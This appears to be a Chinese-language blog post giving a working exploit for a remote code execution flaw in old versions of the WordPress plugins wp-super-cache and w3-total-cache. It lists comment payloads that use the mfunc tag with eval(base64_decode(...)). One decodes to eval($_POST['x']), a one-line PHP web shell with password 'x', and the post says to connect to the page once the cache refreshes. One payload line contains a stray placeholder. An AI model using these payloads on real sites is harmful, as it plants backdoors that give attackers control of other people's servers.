wordpress缓存插件远程代码执行漏洞的利用

/ 0评 / 0

存在漏洞的插件名称及版本:

1.wp-super-cache 1.3以下版本

2.w3-total-cache 0.9.2.9以下版本

这两个插件的漏洞官方已经修复.....

漏洞原理是缓存插件在生成一个页面的新缓存时,解析了PHP代码片段。我们将PHP代码写入到目标的文章评论中,当缓存更新后,就可实现插入后门等行为。

两种插件都已测试,都能成功....

利用方法:

在评论的地方插入如下代码:

<span style="color: #ff0000;"><!--mfunc eval(base64_decode(redacted, see a trend here)); --><!--/mfunc--></span>
<span style="color: #ff0000;"> /*base64加密的诸如*/eval($_POST["i0day"]);/*一句话后门可在这里被执行*/</span>
<span style="color: #ff0000;"> /*可以利用fopen生成一句话....</span>
<!--mfunc eval(base64_decode(ZXZhbCgkX1BPU1RbIngiXSk7)); --><!--/mfunc-->  一句话  密码  x

成功后直接连接当前页面即可,如http://127.0.0.1/wp/archives/1192
测试phpinfo截图:

发表评论

电子邮件地址不会被公开。 必填项已用*标注